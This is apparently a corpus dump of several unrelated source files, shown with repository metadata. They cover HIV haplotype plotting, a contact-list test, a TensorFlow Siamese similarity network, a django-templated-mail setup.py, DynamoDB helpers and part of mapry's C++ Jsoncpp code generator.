        title: optional plot title
        picker: forwarded to fill_between for interactive picking
    Returns:
        (fig, ax)
    '''
    import hivwholeseq.utils.plot
    from matplotlib import cm
    import matplotlib.pyplot as plt
    import seaborn as sns
    sns.set_style('darkgrid')
    fs = 16
    if figax is None:
        fig, ax = plt.subplots(figsize=(12, 7))
    else:
        fig, ax = figax
    # TODO: The hard part is finding an ordering
    hft_cum = hft.cumsum(axis=1)
    # Randomize colors to make them more visible
    colors = cm.jet(1.0 * np.arange(hft.shape[1]) / hft.shape[1])
    np.random.shuffle(colors)
    # Use fake zero/one for logit plots
    freqmin = 1e-6
    # Plot first line
    ax.fill_between(times, hft_cum[:, 0], freqmin + np.zeros(hft.shape[0]), color=colors[0],
                    label=str(0),
                    picker=picker)
    # Each subsequent band is drawn between its cumulative curve and the
    # previous one (clipped below 1-freqmin for logit-scale safety).
    for i in xrange(1, hft.shape[1]):
        ax.fill_between(times, hft_cum[:, i],
                        np.minimum(1-freqmin, hft_cum[:, i - 1]), color=colors[i],
                        label=str(i),
                        picker=picker)
    ax.set_xlabel('Time from infection [days]', fontsize=fs)
    ax.set_ylabel('Haplotype frequency', fontsize=fs)
    ax.set_ylim(1e-4, 1 - 1e-4)
    ax.set_xlim(times[0], times[-1])
    ax.xaxis.set_tick_params(labelsize=fs)
    ax.yaxis.set_tick_params(labelsize=fs)
    if title:
        ax.set_title(title, fontsize=fs)
    return (fig, ax)
# Script
if __name__ == '__main__':
    # NOTE: this file is Python 2 (print statement below).
    # Parse input args
    parser = argparse.ArgumentParser(description='Get local haplotypes',
                                     formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    parser.add_argument('--patient', required=True,
                        help='Patient to analyze')
    parser.add_argument('--region', required=True,
                        help='Genomic region (e.g. V3 p17)')
    parser.add_argument('--verbose', type=int, default=0,
                        help='Verbosity level [0-4]')
    parser.add_argument('--plot', action='store_true',
                        help='Plot local haplotype trajectories')
    args = parser.parse_args()
    pname = args.patient
    region = args.region
    VERBOSE = args.verbose
    use_plot = args.plot
    patient = load_patient(pname)
    patient.discard_nonsequenced_samples()
    if VERBOSE >= 1:
        print patient.name, region
    hct, ind, seqs = patient.get_haplotype_count_trajectory(region,
                                                            aligned=True)
    # Convert haplotype counts to per-timepoint frequencies.
    hft = (1.0 * hct.T / hct.sum(axis=1)).T
    if use_plot:
        times = patient.times[ind]
        plot_haplotype_frequencies(times, hft, title=patient.code+', '+region)
        plt.tight_layout()
        plt.ion()
        plt.show()
| 2.390625 | 2 |
test/test_contact_details_db.py | tankisleva/python_training | 0 | 12769744 | <reponame>tankisleva/python_training<filename>test/test_contact_details_db.py
from model.contact import Contact
def test_deatails_on_contact_tabe(app, db):
    """UI/DB consistency check: contact details scraped from the web table
    must equal the contact rows read straight from the database.
    NOTE(review): the name has typos ("deatails", "tabe") but renaming would
    change the pytest-collected test id, so it is left as-is."""
    contact_from_table_list = app.contact.get_contact_list_all_data_from_table()
    contact_list_db = db.get_contact_list_all_data()
    assert sorted(contact_from_table_list, key=Contact.id_or_max) == sorted(contact_list_db, key=Contact.id_or_max)
| 2.5625 | 3 |
tf/siamese_network.py | zxlzr/atec_back | 0 | 12769745 | <gh_stars>0
#!/usr/bin/env python
# coding=utf-8
import tensorflow as tf
class SiameseNets(object):
    """
    A Siamese CNN/RNN based network for text similarity.
    Uses a character/word level embedding layer, followed by a {`BiLSTM`, `CNN`, `combine`} network
    and Energy Loss layer.
    """
    def __init__(self,
                 model_type,
                 sequence_length,
                 embedding_size,
                 word_embedding_type,
                 vocab_size,
                 filter_sizes,
                 num_filters,
                 rnn_cell,
                 hidden_units,
                 num_layers,
                 l2_reg_lambda,
                 pred_threshold,
                 energy_func,
                 loss_func='contrasive',
                 margin=0.0,
                 contrasive_loss_pos_weight=1.0,
                 dense_layer=False,
                 use_attention=False,
                 weight_sharing=True):
        """Build the whole TF1 graph: placeholders, twin encoders, the
        similarity (energy) head, the loss and evaluation metrics.
        NOTE: `loss_func='contrasive'` / `'cross_entrophy'` keep the
        original (misspelled) option strings for caller compatibility.
        """
        self.seqlen1 = tf.placeholder(tf.int32, [None])
        self.seqlen2 = tf.placeholder(tf.int32, [None])
        self.input_x1 = tf.placeholder(tf.int32, [None, sequence_length], name="input_x1")
        self.input_x2 = tf.placeholder(tf.int32, [None, sequence_length], name="input_x2")
        self.input_y = tf.placeholder(tf.float32, [None], name="input_y")
        self.dropout_keep_prob = tf.placeholder(tf.float32, name="dropout_keep_prob")
        #self.dropout_emb = tf.placeholder(tf.float32, name="dropout_emb")
        # input word level dropout, data augmentation, invariance to small input change
        # self.shape = tf.shape(self.input_x1)
        # self.mask1 = tf.cast(tf.random_uniform(self.shape) > 0.1, tf.int32)
        # self.mask2 = tf.cast(tf.random_uniform(self.shape) > 0.1, tf.int32)
        # self.input_x1 = self.input_x1 * self.mask1
        # self.input_x2 = self.input_x2 * self.mask2
        with tf.variable_scope("embedding"):
            if word_embedding_type == "rand":
                self.W = tf.Variable(
                    tf.random_uniform([vocab_size, embedding_size], -1.0, 1.0),
                    trainable=True, name="W") # tf.truncated_normal()
                # self.W = tf.get_variable(name='W', shape=[vocab_size, embedding_size],
                #                          initializer=tf.random_uniform_initializer(-1, 1))
            else:
                # "static" keeps pretrained embeddings frozen; anything else
                # fine-tunes them.
                trainable = False if word_embedding_type == "static" else True
                self.W = tf.Variable(
                    tf.constant(0.0, shape=[vocab_size, embedding_size]),
                    trainable=trainable, name="W")
                # embedding_placeholder = tf.placeholder(tf.float32, [vocab_size, embedding_size])
                # self.embedding_init = self.W.assign(embedding_placeholder)
            self.embedded_1 = tf.nn.embedding_lookup(self.W, self.input_x1)
            self.embedded_2 = tf.nn.embedding_lookup(self.W, self.input_x2)
            # Input embedding dropout. very sensitive to the dropout rate !
            # NOTE(review): keep-prob is hard-coded to 0.7, so embedding
            # dropout is also active at inference time -- confirm intended.
            self.embedded_1 = tf.nn.dropout(self.embedded_1, 0.7)
            self.embedded_2 = tf.nn.dropout(self.embedded_2, 0.7)
        self.embedded_1_expanded = tf.expand_dims(self.embedded_1, -1) # shape(batch_size, seq_len, dim, 1)
        self.embedded_2_expanded = tf.expand_dims(self.embedded_2, -1)
        # Shared scope names make the two towers share weights.
        if weight_sharing:
            cnn_scope1, cnn_scope2, rnn_scope1, rnn_scope2 = "CNN", "CNN", "RNN", "RNN"
        else:
            cnn_scope1, cnn_scope2, rnn_scope1, rnn_scope2 = "CNN1", "CNN2", "RNN1", "RNN2"
        # shape(batch_size, num_filters*len(filters_sizes)) # very sparse !
        self.cnn_out1 = self.cnn(self.embedded_1_expanded,
                                 sequence_length, embedding_size, filter_sizes, num_filters, scope=cnn_scope1)
        self.cnn_out2 = self.cnn(self.embedded_2_expanded,
                                 sequence_length, embedding_size, filter_sizes, num_filters, scope=cnn_scope2)
        # shape(batch_size, 2*hidden_units)
        self.rnn_out1 = self.bi_rnn(self.embedded_1, rnn_cell, hidden_units, num_layers,
                                    self.seqlen1, False, use_attention, rnn_scope1)
        self.rnn_out2 = self.bi_rnn(self.embedded_2, rnn_cell, hidden_units, num_layers,
                                    self.seqlen2, False, use_attention, rnn_scope2)
        # Select the encoder output(s): CNN, RNN, or their concatenation.
        if model_type.lower() == 'cnn':
            self.out1 = self.cnn_out1
            self.out2 = self.cnn_out2
        elif model_type.lower() == 'rnn':
            self.out1 = self.rnn_out1
            self.out2 = self.rnn_out2
        elif model_type.lower() == 'rcnn':
            self.out1 = tf.concat([self.cnn_out1, self.rnn_out1], axis=1)
            self.out2 = tf.concat([self.cnn_out2, self.rnn_out2], axis=1)
        if dense_layer:
            # Optional per-tower projection to 128 dims (weights NOT shared).
            with tf.variable_scope("fc"):
                out_dim = self.out1.get_shape().as_list()[1]
                W1 = tf.get_variable("W1", shape=[out_dim, 128], initializer=tf.contrib.layers.xavier_initializer())
                b1 = tf.Variable(tf.constant(0.1, shape=[128]), name="b1")
                W2 = tf.get_variable("W2", shape=[out_dim, 128], initializer=tf.contrib.layers.xavier_initializer())
                b2 = tf.Variable(tf.constant(0.1, shape=[128]), name="b2")
                self.out1 = tf.nn.xw_plus_b(self.out1, W1, b1, name="out1")
                self.out2 = tf.nn.xw_plus_b(self.out2, W2, b2, name="out2")
        self.mul = tf.multiply(self.out1, self.out2)
        #self.concat = tf.concat([self.out1, self.out2], axis=1)
        out1_norm = tf.sqrt(tf.reduce_sum(tf.square(self.out1), 1))
        # tf.norm(tensor, ord='euclidean', axis=None, keep_dims=False, name=None)
        out2_norm = tf.sqrt(tf.reduce_sum(tf.square(self.out2), 1))
        self.distance = tf.sqrt(tf.reduce_sum(tf.square(self.out1-self.out2), 1, keep_dims=False))
        # normalize euclidean distance, think as triangle, so dis range [0,1]
        self.distance = tf.div(self.distance, tf.add(out1_norm, out2_norm))
        self.sim_euc = tf.subtract(1.0, self.distance, name="euc")
        # self.sim = tf.reduce_sum(tf.multiply(self.out1, self.out2), 1) / tf.multiply(out1_norm, out2_norm)
        # # shape(batch_size,), if keep_dims=True shape(batch_size, 1)
        out1_norm = tf.nn.l2_normalize(self.out1, 1) # output = x / sqrt(max(sum(x**2), epsilon))
        out2_norm = tf.nn.l2_normalize(self.out2, 1)
        self.sim_cos = tf.reduce_sum(tf.multiply(out1_norm, out2_norm), axis=1, name="cosine")
        # sim = exp(-||x1-x2||) range (0, 1]
        self.sim_ma = tf.exp(-tf.reduce_sum(tf.abs(self.out1-self.out2), 1), name="manhattan")
        # NOTE(review): the result of this concat is never used -- dead op?
        tf.concat([self.out1, self.out2, self.out1-self.out2, ], axis=1)
        if energy_func == 'euclidean':
            self.e = self.sim_euc
        elif energy_func == 'cosine':
            self.e = self.sim_cos
        elif energy_func == 'exp_manhattan':
            self.e = self.sim_ma
        elif energy_func == 'combine':
            # Learnable mixing weight; initialized to 0, i.e. pure cosine
            # at the start of training.
            w = tf.Variable(0, dtype=tf.float32)
            #self.e = w*self.sim_euc + (1-w)*self.sim_cos
            self.e = w*self.sim_euc + (1-w)*self.sim_cos
            # self.fc1 = tf.layers.dense(tf.concat(
            #     [tf.expand_dims(self.sim_euc, 1), tf.expand_dims(self.sim_cos, 1)], 1), 128, activation=tf.nn.relu, name='fc1')
            # self.e = tf.layers.dense(self.fc1, 1, activation=tf.nn.relu, name='score')
            #self.e = tf.layers.dense(tf.concat([tf.expand_dims(self.sim_euc, 1),
            #tf.expand_dims(self.sim_cos, 1) ], 1), 1, activation=tf.nn.relu, name='score')
        with tf.name_scope("loss"):
            if loss_func == 'contrasive':
                self.loss = self.contrastive_loss(self.input_y, self.e, margin, pos_weight=contrasive_loss_pos_weight)
            elif loss_func == 'cross_entrophy':
                self.loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(labels=self.input_y, logits=self.e))
            # add l2 reg except bias and BN variables.
            self.l2 = l2_reg_lambda * tf.reduce_sum(
                [tf.nn.l2_loss(v) for v in tf.trainable_variables() if not ("noreg" in v.name or "bias" in v.name)])
            self.loss += self.l2
            if use_attention:
                # Self-attention penalization term (see bi_rnn).
                self.loss += tf.reduce_mean(self.P)
        # Accuracy computation is outside of this class.
        with tf.name_scope("metrics"):
            # tf.rint: Returns element-wise integer closest to x. auto threshold 0.5
            self.y_pred = tf.cast(tf.greater(self.e, pred_threshold), dtype=tf.float32, name="y_pred")
            # self.accuracy = tf.reduce_mean(tf.cast(tf.equal(self.y_pred, self.input_y), tf.float32), name="accuracy")
            TP = tf.count_nonzero(self.input_y * self.y_pred, dtype=tf.float32)
            TN = tf.count_nonzero((self.input_y - 1) * (self.y_pred - 1), dtype=tf.float32)
            FP = tf.count_nonzero(self.y_pred * (self.input_y - 1), dtype=tf.float32)
            FN = tf.count_nonzero((self.y_pred - 1) * self.input_y, dtype=tf.float32)
            # tf.div like python2 division, tf.divide like python3
            self.cm = tf.confusion_matrix(self.input_y, self.y_pred, name="confusion_matrix") # [[5036 1109] [842 882]]
            self.acc = tf.divide(TP + TN, TP + TN + FP + FN, name="accuracy")
            self.precision = tf.divide(TP, TP + FP, name="precision")
            self.recall = tf.divide(TP, TP + FN, name="recall")
            self.f1 = tf.divide(2 * self.precision * self.recall, self.precision + self.recall, name="F1_score")

    def bi_rnn(self, x, rnn_cell, hidden_units, num_layers, sequence_length, dynamic, use_attention, scope):
        """Bidirectional multi-layer LSTM/GRU encoder; returns one vector
        per example (last hidden state, or attention output)."""
        with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
            # scope.reuse_variables() # or tf.get_variable_scope().reuse_variables()
            # current_batch_of_words does not correspond to a "sentence" of words
            # but [t_steps, batch_size, num_features]
            # Unpacks the given dimension of a rank-`R` tensor into rank-`(R-1)` tensors.
            # sequence_length list tensors of shape (batch_size, embedding_dim)
            if not dynamic:
                x = tf.unstack(tf.transpose(x, perm=[1, 0, 2])) # `static_rnn` input
            if rnn_cell.lower() == 'lstm':
                rnn_cell = tf.nn.rnn_cell.LSTMCell
            elif rnn_cell.lower() == 'gru':
                rnn_cell = tf.nn.rnn_cell.GRUCell
            with tf.variable_scope("fw"):
                # state(c, h), tf.nn.rnn_cell.BasicLSTMCell does not support gradient clipping, use tf.nn.rnn_cell.LSTMCell.
                fw_cells = [rnn_cell(hidden_units) for _ in range(num_layers)]
                fw_cells = tf.nn.rnn_cell.MultiRNNCell(cells=fw_cells, state_is_tuple=True)
                fw_cells = tf.nn.rnn_cell.DropoutWrapper(fw_cells, input_keep_prob=1, output_keep_prob=self.dropout_keep_prob,
                                                         state_keep_prob=1.0, variational_recurrent=False, dtype=tf.float32)
            with tf.variable_scope("bw"):
                bw_cells = [rnn_cell(hidden_units) for _ in range(num_layers)]
                bw_cells = tf.nn.rnn_cell.MultiRNNCell(cells=bw_cells, state_is_tuple=True)
                bw_cells = tf.nn.rnn_cell.DropoutWrapper(bw_cells, input_keep_prob=1, output_keep_prob=self.dropout_keep_prob,
                                                         variational_recurrent=False, dtype=tf.float32)
            if dynamic:
                # [batch_size, max_time, cell_fw.output_size]
                outputs, output_states = tf.nn.bidirectional_dynamic_rnn(
                    fw_cells, bw_cells, x, sequence_length=sequence_length, dtype=tf.float32)
                # outputs = tf.concat(outputs, 2)
                # outputs = outputs[:, -1, :] # take last hidden states (batch_size, 2*hidden_units)
                output_fw = output_states[0][0].h
                output_bw = output_states[0][1].h
                outputs = tf.concat([output_fw, output_bw], 1)
            else:
                # `static_rnn` Returns: A tuple (outputs, output_state_fw, output_state_bw)
                # outputs is a list of outputs (one for each input), depth-concatenated forward and backward outputs.
                outputs, _, _ = tf.nn.static_bidirectional_rnn(fw_cells, bw_cells, x, dtype=tf.float32)
                # outputs = tf.reduce_mean(outputs, 0) # average [batch_size, hidden_units] (mean pooling)
                # outputs = tf.reduce_max(outputs, axis=0) # max pooling, bad result.
            if use_attention:
                # Structured self-attention (Lin et al. 2017): r attention
                # hops of size d_a over the hidden states.
                d_a = 300
                r = 2
                self.H = tf.transpose(tf.stack(outputs), perm=[1, 0, 2]) # (bs, seq_len, 2*hidden_units)
                batch_size = tf.shape(self.input_x1)[0]
                initializer = tf.contrib.layers.xavier_initializer()
                with tf.variable_scope("attention"):
                    # shape(W_s1) = d_a * 2u
                    self.W_s1 = tf.get_variable('W_s1', shape=[d_a, 2 * hidden_units], initializer=initializer)
                    # shape(W_s2) = r * d_a
                    self.W_s2 = tf.get_variable('W_s2', shape=[r, d_a], initializer=initializer)
                    # shape (d_a, 2u) --> shape(batch_size, d_a, 2u)
                    self.W_s1 = tf.tile(tf.expand_dims(self.W_s1, 0), [batch_size, 1, 1])
                    self.W_s2 = tf.tile(tf.expand_dims(self.W_s2, 0), [batch_size, 1, 1])
                    # attention matrix A = softmax(W_s2*tanh(W_s1*H^T) shape(A) = batch_siz * r * n
                    self.H_T = tf.transpose(self.H, perm=[0, 2, 1], name="H_T")
                    self.A = tf.nn.softmax(tf.matmul(self.W_s2, tf.tanh(tf.matmul(self.W_s1, self.H_T)), name="A"))
                    # sentences embedding matrix M = AH shape(M) = (batch_size, r, 2u)
                    self.M = tf.matmul(self.A, self.H, name="M")
                    outputs = tf.reshape(self.M, [batch_size, -1])
                with tf.variable_scope("penalization"):
                    # penalization term: Frobenius norm square of matrix AA^T-I, ie. P = |AA^T-I|_F^2
                    A_T = tf.transpose(self.A, perm=[0, 2, 1], name="A_T")
                    I = tf.eye(r, r, batch_shape=[batch_size], name="I")
                    self.P = tf.square(tf.norm(tf.matmul(self.A, A_T) - I, axis=[-2, -1], ord='fro'), name="P")
            else:
                outputs = outputs[-1] # take last hidden state [batch_size, hidden_units]
            return outputs

    def cnn(self, x, sequence_length, embedding_size, filter_sizes, num_filters, scope):
        """Multi-width text CNN (conv + max-pool per filter size) followed
        by dropout and a 128-dim projection."""
        with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
            # Create a convolution + maxpool layer for each filter size
            pooled_outputs = []
            for i, filter_size in enumerate(filter_sizes):
                with tf.variable_scope("conv-maxpool-%s" % filter_size, reuse=None):
                    # Convolution Layer
                    filter_shape = [filter_size, embedding_size, 1, num_filters]
                    W = tf.get_variable("W", filter_shape, initializer=tf.truncated_normal_initializer(stddev=0.1))
                    b = tf.get_variable("bias", [num_filters], initializer=tf.constant_initializer(0.1))
                    conv = tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding="VALID", name="conv")
                    h = tf.nn.relu(tf.nn.bias_add(conv, b), name="relu")
                    # Maxpooling over the outputs
                    pooled = tf.nn.max_pool(h, ksize=[1, sequence_length - filter_size + 1, 1, 1],
                                            strides=[1, 1, 1, 1], padding='VALID',name="pool")
                    pooled_outputs.append(pooled)
            # Combine all the pooled features
            num_filters_total = num_filters * len(filter_sizes)
            h_pool = tf.concat(pooled_outputs, 3)
            h_pool_flat = tf.reshape(h_pool, [-1, num_filters_total]) # very sparse !
            with tf.name_scope("dropout"):
                h_drop = tf.nn.dropout(h_pool_flat, self.dropout_keep_prob)
            with tf.name_scope("output"):
                W = tf.get_variable("W", shape=[num_filters_total, 128],
                                    initializer=tf.contrib.layers.xavier_initializer())
                b = tf.Variable(tf.constant(0.1, shape=[128]), name="b")
                outputs = tf.nn.xw_plus_b(h_drop, W, b, name="outputs")
                # outputs = h_pool_flat
        return outputs

    def contrastive_loss(self, y, e, margin, pos_weight):
        """Contrastive loss on similarity *e* in [0,1]: positives are pulled
        toward 1 (weighted by *pos_weight*), negatives pushed below *margin*."""
        # margin and pos_weight can directly influence P and R metrics.
        l_1 = pos_weight * tf.pow(1-e, 2)
        l_0 = tf.square(tf.maximum(e-margin, 0))
        loss = tf.reduce_mean(y * l_1 + (1 - y) * l_0)
        return loss

    @property
    def variables(self):
        """All global variables of the graph (for saving/inspection)."""
        # for v in tf.trainable_variables():
        #     print(v)
        return tf.global_variables()
if __name__ == '__main__':
    # Smoke test: build the graph once with a representative configuration
    # to surface wiring errors early.
    siamese = SiameseNets(
        model_type='rcnn',
        sequence_length=15,
        embedding_size=128,
        word_embedding_type='rand',
        vocab_size=1000,
        filter_sizes=[3,4,5],
        num_filters=100,
        rnn_cell='lstm',
        hidden_units=64,
        num_layers=3,
        dense_layer=False,
        l2_reg_lambda=1,
        pred_threshold=0.5,
        energy_func='euclidean',
        # NOTE(review): 'contrasive' (sic) is preserved as-is — it must match
        # the spelling the SiameseNets constructor expects; confirm upstream.
        loss_func='contrasive',
        contrasive_loss_pos_weight=1.0,
        margin=0.0,
        weight_sharing=False)
    # get all ops
    # print([node.name for node in tf.get_default_graph().as_graph_def().node])
# Minimal interactive command stub: read one command and show the help line.
x = input()
if x == ".helpf":
    # NOTE(review): the trigger ".helpf" differs from the advertised ".help";
    # preserved as-is — confirm which spelling is intended.
    print(".help : to show help menu")
setup.py | nullablebool/django-templated-mail | 0 | 12769747 | <reponame>nullablebool/django-templated-mail
#!/usr/bin/env python
import os
from setuptools import setup
# Load the long description for PyPI from the README.
with open('README.rst', 'r') as f:
    readme = f.read()
def get_packages(package):
    """Return every directory under ``package`` that is a Python package.

    A directory counts as a package when it contains an ``__init__.py``.
    """
    packages = []
    for dirpath, _dirnames, _filenames in os.walk(package):
        if os.path.exists(os.path.join(dirpath, '__init__.py')):
            packages.append(dirpath)
    return packages
# Package metadata; get_packages discovers all sub-packages of
# `templated_mail` so none have to be listed by hand.
setup(
    name='django-templated-mail',
    version='1.1.2',
    packages=get_packages('templated_mail'),
    license='MIT',
    author='Sunscrapers',
    description='Send emails using Django template system.',
    author_email='<EMAIL>',
    long_description=readme,
    install_requires=[],
    include_package_data=True,
    url='https://github.com/sunscrapers/django-templated-mail',
    classifiers=[
        'Development Status :: 5 - Production/Stable',
        'Framework :: Django :: 1.11',
        'Framework :: Django :: 2.0',
        'Framework :: Django :: 2.1',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: MIT License',
        'Operating System :: OS Independent',
        'Programming Language :: Python',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3.4',
        'Programming Language :: Python :: 3.5',
        'Programming Language :: Python :: 3.6',
    ]
)
| 1.492188 | 1 |
app/storage/dynamo_api.py | uk-gov-mirror/ONSdigital.eq-survey-runner | 27 | 12769748 | <reponame>uk-gov-mirror/ONSdigital.eq-survey-runner
from flask import current_app
from structlog import get_logger
logger = get_logger()
def put_item(table_name, key_field, item, overwrite=True):
    """Insert ``item`` into the table named ``table_name``.

    :param key_field: name of the key attribute, used in the conditional write
    :param overwrite: when False, only write if no item with this key exists
    :return: True if DynamoDB responded with HTTP 200
    """
    kwargs = {'Item': item}
    if not overwrite:
        # Conditional write: succeed only when the key is not present yet.
        kwargs['ConditionExpression'] = 'attribute_not_exists({key_field})'.format(
            key_field=key_field)
    result = get_table(table_name).put_item(**kwargs)
    status_code = result['ResponseMetadata']['HTTPStatusCode']
    return status_code == 200
def get_item(table_name, key):
    """Fetch the item stored under ``key`` with a consistent read.

    :return: the item, or None when no item exists for the key
    """
    response = get_table(table_name).get_item(Key=key, ConsistentRead=True)
    return response.get('Item', None)
def delete_item(table_name, key):
    """Delete the item stored under ``key``.

    :return: the deleted item's attributes, or None if nothing was stored
    """
    table = get_table(table_name)
    # ReturnValues='ALL_OLD' is required for DynamoDB to echo the deleted item
    # back; without it the response never contains the item, and the previous
    # implementation (which also read the wrong 'Item' key instead of
    # 'Attributes') always returned None.
    response = table.delete_item(Key=key, ReturnValues='ALL_OLD')
    return response.get('Attributes', None)
def get_table(table_name):
    """Resolve ``table_name`` against the DynamoDB resource stored on the app."""
    dynamodb = current_app.eq['dynamodb']
    return dynamodb.Table(table_name)
| 2.40625 | 2 |
mapry/cpp/generate/jsoncpp_impl.py | Parquery/mapry | 11 | 12769749 | <filename>mapry/cpp/generate/jsoncpp_impl.py
"""Generate the implementation of de/serialization from/to Jsoncpp values."""
# pylint: disable=too-many-lines
# pylint: disable=too-many-arguments
import re
import textwrap
from typing import ( # pylint: disable=unused-import
Dict, List, Mapping, MutableMapping, Set, Union)
import icontract
from icontract import ensure
import mapry
import mapry.cpp.generate
import mapry.cpp.jinja2_env
import mapry.cpp.naming
import mapry.indention
def _needs_regex(a_type: mapry.Type) -> bool:
    """
    Check whether the generated code for ``a_type`` requires a regex.

    Strings and paths need one only when they carry a pattern constraint;
    durations always need one to parse their textual representation.

    :param a_type: to be inspected
    :return: True if the type needs a regular expression
    """
    if isinstance(a_type, (mapry.String, mapry.Path)):
        return bool(a_type.pattern)

    return isinstance(a_type, mapry.Duration)
@ensure(lambda result: not result.endswith('\n'))
def _includes(
        graph: mapry.Graph, types_header_path: str, parse_header_path: str,
        jsoncpp_header_path: str, cpp: mapry.Cpp) -> str:
    """
    Generate the include directives of the implementation file.

    Includes are grouped into first-party (generated headers), third-party
    and STL blocks, each sorted alphabetically.

    :param graph: mapry definition of the object graph
    :param types_header_path: defines the types of the object graph
    :param parse_header_path: defines the general parsing structures
    :param jsoncpp_header_path:
        defines parsing and serializing functions from/to Jsoncpp
    :param cpp: C++ settings
    :return: generated code
    """
    # yapf: disable
    first_party_block = {
        '#include "{}"'.format(pth)
        for pth in [types_header_path, parse_header_path, jsoncpp_header_path]}
    # yapf: enable
    third_party_block = set()  # type: Set[str]
    # Base STL headers needed by every generated implementation file.
    stl_block = {
        "#include <cstring>", "#include <string>", "#include <sstream>",
        '#include <stdexcept>', "#include <memory>", "#include <utility>"
    }
    ##
    # See if we need any regular expressions
    ##
    # A single regex-requiring type or an ID pattern anywhere in the graph
    # pulls in <regex>.
    include_regex = False
    for a_type, _ in mapry.iterate_over_types(graph=graph):
        if _needs_regex(a_type=a_type):
            include_regex = True
            break
    for cls in graph.classes.values():
        if cls.id_pattern is not None:
            include_regex = True
            break
    if include_regex:
        stl_block.add("#include <regex>")
    ##
    # Date/time includes
    ##
    if cpp.datetime_library == 'ctime':
        # yapf: disable
        if any(mapry.needs_type(a_type=graph, query=query_type)
               for query_type in [mapry.Date, mapry.Time, mapry.Datetime]):
            # yapf: enable
            # needed at least for tm_to_string function
            # (NOTE: <cstring> is already in the base set, so this is a no-op)
            stl_block.add("#include <cstring>")
    elif cpp.datetime_library == 'date.h':
        # yapf: disable
        if any(mapry.needs_type(a_type=graph, query=query_type)
               for query_type in [mapry.Date, mapry.Time, mapry.Datetime]):
            # yapf: enable
            # needed at least to parse the date.h date/times.
            stl_block.add("#include <sstream>")
            third_party_block.add("#include <date/date.h>")
        if mapry.needs_type(a_type=graph, query=mapry.TimeZone):
            third_party_block.add("#include <date/tz.h>")
    else:
        raise NotImplementedError(
            "Unhandled datetime library: {}".format(cpp.datetime_library))
    if mapry.needs_type(a_type=graph, query=mapry.Duration):
        # needed at least for duration_to_string function
        stl_block.add("#include <iomanip>")
        # needed at least for duration_from_string function
        stl_block.add("#include <limits>")
        stl_block.add("#include <cmath>")
    ##
    # Assemble
    ##
    # yapf: disable
    block_strs = (
        ['\n'.join(sorted(first_party_block))] +
        ['\n'.join(sorted(third_party_block))] +
        ['\n'.join(sorted(stl_block))])
    # yapf: enable
    # Empty groups are dropped so that there are no stray blank lines.
    return '\n\n'.join(
        [block_str for block_str in block_strs if block_str.strip()])
@ensure(lambda result: not result.endswith('\n'))
def _message_function() -> str:
    """
    Generate the C++ helper ``message`` used by the error-reporting snippets.

    The helper concatenates a compile-time description with a runtime detail
    string while pre-reserving the buffer.

    :return: generated code
    """
    return textwrap.dedent(
        '''\
/**
 * generates an error message.
 *
 * @param cc char array as the description part of the message
 * @param cc_size size of the char array
 * @param s string as the detail part of the message
 * @return concatenated string
 */
std::string message(const char* cc, size_t cc_size, std::string s) {
    std::string result;
    result.reserve(cc_size + s.size());
    result.append(cc, cc_size);
    result.append(s);
    return result;
}''')
@ensure(lambda result: not result.endswith('\n'))
def _regex_constants(graph: mapry.Graph) -> str:
    """
    Generate the code to define regular expressions as constants.

    Emits the ISO-8601-like duration regex when the graph uses durations,
    plus one ``kID`` regex per class with an ID pattern.

    :param graph: mapry definition of the object graph
    :return: generated code
    """
    blocks = []  # type: List[str]
    # define regular expressions for duration
    if mapry.needs_type(a_type=graph, query=mapry.Duration):
        re_block = mapry.indention.reindent(
            '''\
namespace re {
const std::regex kDuration(
    "^(\\\\+|-)?P(((0|[1-9][0-9]*)(\\\\.[0-9]+)?)Y)?"
    "(((0|[1-9][0-9]*)(\\\\.[0-9]+)?)M)?"
    "(((0|[1-9][0-9]*)(\\\\.[0-9]+)?)W)?"
    "(((0|[1-9][0-9]*)(\\\\.[0-9]+)?)D)?"
    "(T"
    "(((0|[1-9][0-9]*)(\\\\.[0-9]+)?)H)?"
    "(((0|[1-9][0-9]*)(\\\\.[0-9]+)?)M)?"
    "(((0|[1-9][0-9]*)(\\\\.([0-9]+))?)S)?"
    ")?$");
} // namespace re''')
        blocks.append(re_block)
    # One ID-validation regex per class that constrains its instance IDs.
    for cls in graph.classes.values():
        if cls.id_pattern is None:
            continue
        blocks.append(
            textwrap.dedent(
                '''\
namespace {composite_varname}_re {{
const std::regex kID(
    R"v0g0n({regex})v0g0n");
}} // namespace {composite_varname}_re'''.format(
                    composite_varname=mapry.cpp.naming.as_variable(
                        identifier=cls.name),
                    regex=cls.id_pattern.pattern)))
    return "\n\n".join(blocks)
@ensure(lambda result: not result.endswith('\n'))
def _duration_from_string() -> str:
    """
    Generate the C++ code for parsing durations from strings.

    The emitted code consists of an overflow-checked ``add_rep_double``
    helper and ``duration_from_string``, which matches ``re::kDuration``
    (see :func:`_regex_constants`) and accumulates the captured interval
    counts into ``std::chrono::nanoseconds``.

    :return: generated code
    """
    # NOTE: everything below is a single runtime string; the match-group
    # indices (mtch[3], mtch[7], ...) correspond to the capture groups of
    # the kDuration regex emitted by _regex_constants.
    return textwrap.dedent(
        '''\
/**
 * adds the left and the right and checks for the overflow.
 *
 * left and right are expected to be non-negative.
 *
 * @param[in] left summand
 * @param[in] right summand
 * @param[out] overflows true if the addition overflows
 * @return sum
 */
template <typename rep_t>
rep_t add_rep_double(rep_t left, double right, bool* overflows) {
    if (left < 0) {
        throw std::invalid_argument("Expected left >= 0");
    }
    if (right < 0) {
        throw std::invalid_argument("Expected right >= 0");
    }
    // 9223372036854775808 == 2^63, the first double that is
    // greater than max int64 (max int64 is 2^63 - 1).
    if (right >= 9223372036854775808.0) {
        *overflows = true;
        return 0;
    }
    const rep_t rightRep = right;
    if (rightRep > std::numeric_limits<rep_t>::max() - left) {
        *overflows = true;
        return 0;
    }
    return rightRep + left;
}

/**
 * parses the duration from a string.
 *
 * Following STL chrono library, the following units are counted as:
 * - years as 365.2425 days (the average length of a Gregorian year),
 * - months as 30.436875 days (exactly 1/12 of years) and
 * - weeks as 7 days.
 *
 * See https://en.cppreference.com/w/cpp/chrono/duration for details.
 *
 * @param[in] s string to parse
 * @param[out] error error message, if any
 * @return parsed duration
 */
std::chrono::nanoseconds duration_from_string(
